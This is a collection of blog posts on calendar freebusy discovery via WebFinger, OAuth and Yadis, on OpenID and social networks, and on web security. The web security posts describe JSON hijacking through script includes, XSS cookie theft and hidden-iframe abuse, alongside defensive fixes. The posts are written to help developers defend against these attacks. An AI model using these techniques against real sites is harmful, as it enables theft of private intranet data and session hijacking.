WebFinger, OAuth and Freebusy lookups

One of the more frustrating aspects of calendaring systems is that the freebusy lookups are all proprietary.  Meeting invitations can be sent from one system to another (assuming you know a time to meet).  However, it is not possible to lookup when someone from Lotuslive, someone from gmail and someone from Yahoo are all available to meet.  In the corporate space this type of scheduling is invaluable.

The format for looking up someone’s freebusy time is included in a standard that was completed in 1998, but they punted on all the hard stuff.  The hard bit, as I have mentioned before, is working out where someone’s freebusy is stored on the web and then authenticating with that store in a manner that can be verified. WebFinger and OAuth are now putting the complete round trip within spitting distance.

Below I’ll propose an approach to scheduling a meeting with my mom (who uses gmail) from LotusLive (which I use). I will be rob@robubu.com (but using LotusLive for my calendaring service) and my mom is mom@gmail.com.  We’ll also assume that my mom has told google that it can share her calendar free time data with any one in her contact list and that I am in her contact list.

  1. I head into my calendar service (on lotuslive), click on Add Event and type mom@gmail.com into the invitees list.
  2. LotusLive now uses WebFinger to lookup the different api services that google provides for access to my mom’s data along with the corresponding URL for the service.  The details on how this works are outlined here on Eran’s blog. At the end of this, LotusLive gets back a XRD document that looks something like the following.

    <?xml version='1.0' encoding='UTF-8'?>
    <XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
        <Subject>acct:mom@gmail.com</Subject>
        <Alias>http://www.google.com/profiles/mom</Alias>
        <Link rel='http://portablecontacts.net/spec/1.0'
              href='http://google.com/api/people/' />
        <Link rel='http://ietf.org/icalendar/freebusy'
              href='https://google.com/api/calendar/mom/freebusy/' />
    </XRD>

    From this LotusLive can now determine that my mom’s freebusy endpoint is at https://google.com/api/calendar/mom/freebusy/.  It concludes this by looking for the link with a rel attribute of http://ietf.org/icalendar/freebusy

  3. If my mom had made her freetime calendar data public then LotusLive can simply retrieve the data from the URL, but to add to the complexity let’s assume that it requires authentication i.e. LotusLive needs to prove to Google that it has rob@robubu.com at the browser and then Google checks that rob@robubu.com is in my mom’s contact list. We’ll do something here very similar to what signed fetches do in opensocial i.e. lotuslive will use OAuth to assert that it has rob@robubu.com at the browser. What we’ll end up with is a url that looks something like

    https://google.com/api/calendar/mom/freebusy/
    ?opensocial_viewer_id=rob@robyates.com
    &xoauth_public_key=https://lotuslive.com/keys/publickey.crt
    &ampoauth_signature_method=RSA-SHA1
    &oauth_signature=djr9rjt0jd78jf88%26jjd99%2524tj88uiths3

    LotusLive has here claimed that it has rob@robubu.com at the browser and using OAuth has signed the request with a private key.  It has also indicated where the public key is to validate the signature.

  4. Google receives the request, retrieves the public key and verifies the signature.  If it trusts signatures and keys from LotusLive (verifiable by retrieving certs from an https url with a lotuslive.com domain) then it is done at this point. However that is a fairly large amount of trust to place on LotusLive as LotusLive could assert on behalf of any identity. Google really needs to check that LotusLive can assert rob@robubu.com’s identity.  Here we’ll use webfinger again.
  5. Google now does a WebFinger lookup on rob@robubu.com and gets an XRD document such as the one below

    <?xml version='1.0' encoding='UTF-8'?>
    <XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
        <Subject>acct:rob@robubu.com</Subject>
        <Link rel='IDP' href='
    https://lotuslive.com' />
    </XRD>

    Google now sees that lotuslive.com is a valid Identity Provider for rob@robubu.com and so accepts the assertion.

  6. Google checks that rob@robubu.com is in my mom’s list of contacts and as I am returns her freebusy.
  7. Finally, LotusLive gets a response from Google outlining my mom’s free time and displays it in a nice calendar.  I can choose a time that she is free and send her an invite.

I know this is not perfect and I know there are probably a fair amount of changes that are needed, but I wanted to jot down something that, I think, is fairly close to a workable solution.  Am very interested in other’s thoughts.

p.s. WebFinger on email addresses does provide a means of discovering valid email addresses, but no where near as much as this does.  The fight against spam can’t center on not making email addresses discoverable.

Opensocial and OAuth specs

The REST api for opensocial makes its appearance in opensocial 0.8. The specification references some other specifications that are also worth a look.

OAuth Consumer Request – This is proposed as the means for server to server authentication between the Consumer site and the Service provider. It has the potential to replace basic auth over SSL which is the only real standards based approach for securely authenticating using a shared secret, given that digest was underspecified.

XRDS-Simple – This also looks promising and it is tackling the whole xri / yadis discovery mess that openid 2.0 seems burdened with.

Facebook – an Openid challenge

Facebook exists because a simple usable federated identity system doesn’t. Wired’s challenge to tear down the social networking silos seems easier to solve if we had such an identity system and I would think that the openid community would take up the reins and lead the charge.

I was therefore somewhat aghast when I saw the original mr. openid and the current mr. openid trying to solve the problem without actually building atop openid. Why? Have they abandoned their offspring? Or is Openid just not the right foundation and in need of a reboot?

The wired article points out that it’s pretty trivial to assemble facebook as long as you don’t mind the entire world seeing what you are doing, your "friends" can even receive event notifications via feedreaders, but then so can the rest of the world. Facebook’s real value, therefore, is an easy to use access control system, limiting who can view your photos, view your posts and get alerts. This access control system, dubbed the "social graph", is embodied as "friends" in facebook and "connections" in linkedin

So why can’t openid enable this in a distributed fashion?  Surely openid should be the basis of any distributed access control system. Why can’t I, who chooses to be hosted on facebook, befriend you on myspace. Why can’t I receive notifications of your recent actions? and why can’t you view my profile? and why can’t all this happen without the prying eyes of the rest of the world?  These seem like the problems that openid should be helping solve. So why didn’t Brad and David choose to build atop it? instead making it’s use optional?

I have to admit to worrying a little about openid’s direction. It can’t get close to the challenge thrown down by Wired and instead of trying to address these very real problems in version 2.0 it has instead chosen to focus on incorporating an obscure naming scheme, which IMHO has introduced unnecessary complexity.  So what could it do? Could the Wired challenge be solved with openid as the base?  I believe the openid community could choose to solve these problems and FWIW, here’s my list of to do’s.

  1. Adopt the world’s most popular naming scheme for individuals.  Yes I know there are privacy issues with using an e-mail address identifier and yes I know there are advantages to http based URI’s, but there is a reason why it is facebook’s primary identifier.  Ignoring it presents real usability and adoption challenges.
  2. Have openid work for REST based web services e.g. feed readers.  The only way that friends can keep track of my latest posts / photos etc. in a distributed fashion is through feeds and if I want to limit who can see them then the feed readers need to authenticate with my service.  Unfortunately openid is designed for interactive user agents and feed readers are anything but that. So please can we have openid designed to work with any http client and not just the "interactive" ones.
  3. Define the "befriend" protocol.  This would be the mechanism that establishes and terminates the relationship between two identities, so they can view each others stuff. Instant messaging has this same problem i.e. establishing who can view my current presence and so there are places to look for inspiration.

Am sure there’s more details e.g. how the "roster" of friends gets sent to the different services but that also sounds familiar. It just seems to me that Brad and David are applying a band aid with their proposal and I’d much prefer they go back to open heart surgery and fix this thing once and for all.

Openid reboot? hmmm, interesting, and if you read the entire thread, blush

p.s. I don’t buy Dave Winer’s economic roadblocks to distributed social networks.  The same argument could be applied to AOL’s and Delphi’s email "walled gardens" prior to 1993.

Safe JSON

Update: March 5th 2007:  Important change to the recommendation for Safe JSON detailed below.  It is not as safe as people think, but it can still be made to be safe.

We have been investigating the security implications of having a JSON api in Connections. It turns out that it is very easy to leave pretty big security exposures in an application if it isn’t done right.  The security exposure in this case is rogue sites being able to get at data made available via a JSON api.  The truly frightening part of this is that applications installed on a corporate intranet can actually leak data to internet sites should a user visit a rogue site. BTW, these exposures apply equally to both formally published api’s such as Yahoo’s and also any internal JSON api’s often used for AJAX tricks.

As far as I can make out there are 3 different approaches used with JSON api’s. Before detailing the vulnerabilities I’ll highlight the three approaches using the Yahoo examples (you might want to familiarize yourself with the examples before reading any further). The three approaches are :

Approach 1 – Plain JSON

Simply return JSON i.e.

{
  "Image": {
    "Width":800,
    "Height":600,
    "Title":"View from 15th Floor",
    "Thumbnail":
    {
      "Url":"http:\/\/scd.mm-b1.yimg.com\/image\/481989943",
      "Height": 125,
      "Width": "100"
    },
  "IDs":[ 116, 943, 234, 38793 ]
  }
}

Approach 2 – var assignment

Assign the JSON object to some variable that can then be accessed by the embedding application (not an approach used by Yahoo).

var result = {
  "Image": {
    "Width":800,
    "Height":600,
    "Title":"View from 15th Floor",
    "Thumbnail":
    {
      "Url":"http:\/\/scd.mm-b1.yimg.com\/image\/481989943",
      "Height": 125,
      "Width": "100"
    },
  "IDs":[ 116, 943, 234, 38793 ]
  }
}

Approach 3 – function callback

When calling the JSON Web Service pass as a parameter a callback function.  The resulting JSON response passes the JSON object as a parameter to this callback function.

callbackFunction( {
  "Image": {
    "Width":800,
    "Height":600,
    "Title":"View from 15th Floor",
    "Thumbnail":
    {
      "Url":"http:\/\/scd.mm-b1.yimg.com\/image\/481989943",
      "Height": 125,
      "Width": "100"
    },
  "IDs":[ 116, 943, 234, 38793 ]
  }
})

All approaches can be used via an XMLHttpRequest followed by a javascript eval, but as Yahoo points out Approaches 2 & 3 unlike Approach 1 don’t "run afoul of browser security restrictions that prevent files from being loaded across domains." as…

"Using JSON and callbacks, you can place the Yahoo! Web Service request inside a <script> tag, and operate on the results with a function elsewhere in the JavaScript code on the page. Using this mechanism, the JSON output from the Yahoo! Web Services request is loaded when the enclosing web page is loaded. No proxy or server trickery is required."

Indeed they have successfully navigated the browser security restrictions, which I should point out is probably fine for Yahoo as ALL their services only expose publically available data.  However, if a developer coding up an application that contains private data uses the same approach (i.e. Approach 2 or 3) then they have exposed the application to a pretty simple attack.  BTW, I’m defining private data to be any data that should not be publically accessible to the entire world (this probably covers most data on a corporate intranet but also includes any data that requires authenticatation prior to access). Here’s an example.

A user logs into a wiki on the corporate intranet.  This wiki provides a JSON api with a callback function (Approach 3).  The user then visits a rogue site on the internet.  The page from the rogue site, when rendered in the user’s browser, performs a javascript include to the wiki’s json api passing a callback function. This results in data from the wiki being made available to the rogue site’s javascript function in the page via the callback. Further javascript, on the page, can then form POST the data back to the rogue site and as such the data can be stolen. Not good.

Approach 1, on the other hand, does not contain this vulnerability as it can’t be used via a javascript include.  If attempted it does not make the any data available on the page as it is not valid javascript, indeed it, instead, results in a javascript error and so is safe for JSON api’s that contain private data.

Recommendation

I’m going to tentatively propose the following recommendation and would welcome feedback.

When developing a JSON api that contains data that should not be publically accessible to the world use Approach 1 i.e. return plain JSON.  Update: The JSON returned MUST be of type "Serialized Object" and not of type "Array" (as defined by the JSON spec).  (See the March 5th update below for the rationale behind this change).  If the data can be publically exposed then Approaches 2 & 3 have significant advantages in terms of consumability.

Update: March 5th 2007

Joe has pointed out that care still needs to be taken even when using a plain JSON return (Approach 1). From my testing and as others have pointed out the vulnerability that Joe is referring to only applies when returning JSON of type "array" (section 2.3 of  the JSON standard). However, it appears that if you return JSON of type "serialized object" (section 2.2) then, at the moment, I know of no vulnerability.  It’s worth mentioning that arrays can still be present in the JSON as long as they are not at the top level. The example in Approach 1 above is not vulnerable to attack even though it contains an embedded array.  The following structure is vulnerable though

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

as google knows only too well

Anyway, I have updated my recommendation.  It remains tentative.

Freebusy and Yadis

So for a while now, we have been trying to figure out a standard means to lookup someone’s freetime from their calendar (called freebusy in the calendaring world).  We knew we wanted a REST service that could be passed url parameters, we even had a demo one up on the net.

The problem, though, had always been how to figure out the url for the service given the user’s e-mail address. Openid, DIX, yadis et al always showed promise, but it always felt clunky to have to first translate an e-mail identifier for the user into an http url based identifier for the user and then ask for an attribute for the calendar service etc. etc. A recent proposal to the yadis mailing list, however, showed the way.  Simply resolve the e-mail address to its domain and use the yadis protocol (section 6) on that to discover a freebusy service for all the members of the domain.

So, for example, let’s say that the e-mail address of someone who I want to schedule a meeting with is rob@robubu.com.  Use the yadis protocol on http://robubu.com, i.e. retrieve the page at http://robubu.com and dereference the "X-XRDS-Location" meta tag in the html head to get back a yadis document (that looks something like this).

<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
   <Service>
    <Type>http://ietf.org/cal/freebusy/1.0</Type>
    <URI>http://robubu.com/calendar/freebusy.php</URI>
   </Service>
  </XRD>
</xrds:XRDS>

Then extract the endpoint for the freebusy service by looking for the URI that corresponds to a service of type "http://ietf.org/cal/freebusy/1.0". Finally, construct the url request that returns the freebusy time in iCalendar format for a given period e.g. http://robubu.com/calendar/freebusy.php?email=rob@robubu.com&start=20070101&end=20071212. Done.

I’ve also hacked a little on webcalendar and got an end point up and running.  The calendar in html is here, but if you want to schedule a meeting with me via yadis and the freebusy api then my e-mail address (for the purposes of the demo) is rob@robubu.com.

Finally, I do want to use the URI Template approach for the URI, but I’ll leave that for another post.

HttpOnly please – more

So my previous post described some of the challenges involved in maintaining security in a site, such as a blogging site, that allows unrestricted / unfiltered user authored content and suggested "HttpOnly" cookies could mitigate some of the risk . "HttpOnly" cookies are, however, not a complete solution. 

The remaining problem is described in one of the comments in the mozilla "HttpOnly" bug posting. Here’s a concrete example. I log into my blog at http://blogs.com/robyates. I then visit the blog http://blogs.com/attacker/. Let’s assume that I am using I.E. and that blogs.com uses "HttpOnly" cookies.  The javascript on the attacker’s blog can’t get access to my "HttpOnly" cookie’s, so it can’t steal my session, but it can open a hidden iframe and then use this iframe to make posts, add spam etc. etc.and given that I have an authenticated session it can do all this under my identity, pretty bad.  It can do this as the attackers blog and my blog are in the same domain i.e. http://blogs.com.

Fortunately, this problem is well understood by the large public blogging organizations such as livejournal. Their approach gives each user their own domain and this domain is separate from the management domain. So, for example, my blog could now be http://robyates.blogs.com, the attackers is http://attacker.blogs.com and my blog is managed at http://manage.blogs.com/robyates.  Now due to cross frame scripting security which also applies to XMLHttpRequests, the javascript on the attackers site is rendered useless. Any javascript running on the attacker.blogs.com domain can’t get access to the data on the robyates.blogs.com or manage.blogs.com domain, so my postings can’t be deleted and spam can’t be added.

The key point here, when designing an application that permits user supplied html, is to segment the application into discrete security regions and assign each region a unique domain. This way any erroneous javascript is constrained to some subset of the complete application.

So in combination with carefully constructed domain partitioning of the application "HttpOnly" cookies show real potential  With any luck we’ll see it show up in firefox real soon, as the bug looks to be heading in the right direction.

Finally, having recently learnt all about this so we can recommend topologies for our new blogging application, it’s got me thinking about how secure any JSON based api is, scary stuff!

HttpOnly please

I am currently working on a multi-user blogging application for corporate deployment. One of the more interesting challenges is how much flexibility we should allow blog posters with their content.  Do we allow them to post javascript and if we do what do we do about XSS vulnerabilities.

Here’s the problem, a user can make a blog post containing any javascript (a property we want to preserve so that we can populate the blog with fancy charting and other tricks only available through javascript).  This post can use XSS attacks against any user viewing the post.  At first glance this doesn’t seem like much of a problem, the attacker only gets to sniff their own blog, however they also get access to the user’s cookies and in a corporate environment, which may be utilizing single sign on, that opens up a big hole in the form of session hijacking.

So what to do?  Google turned up what seems like a really nice solution in IE and it’s a solution that appears to be gaining momentum. Essentially, it allows a cookie to declare that it is not available to javascript in the browser and so session hijacking becomes practically impossible. It does this by simply adding HttpOnly to the end of the Set-Cookie header e.g.

Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly

done, right ?………… WRONG.  It turns out that there are a few things that still need to fall in the place. The firefox community has been debating exactly how to implement it since 2002.  Then there’s the need to be able to set it from Java uh oh, and we still have to figure out what support we get from the cookies set by Websphere, Netegrity, Web Seal et al.

Anyway, it shows a fair bit of promise and yes I know it doesn’t shut down all the vulnerabilities, but it is a step in the right direction and something we’ll certainly be looking into in more detail.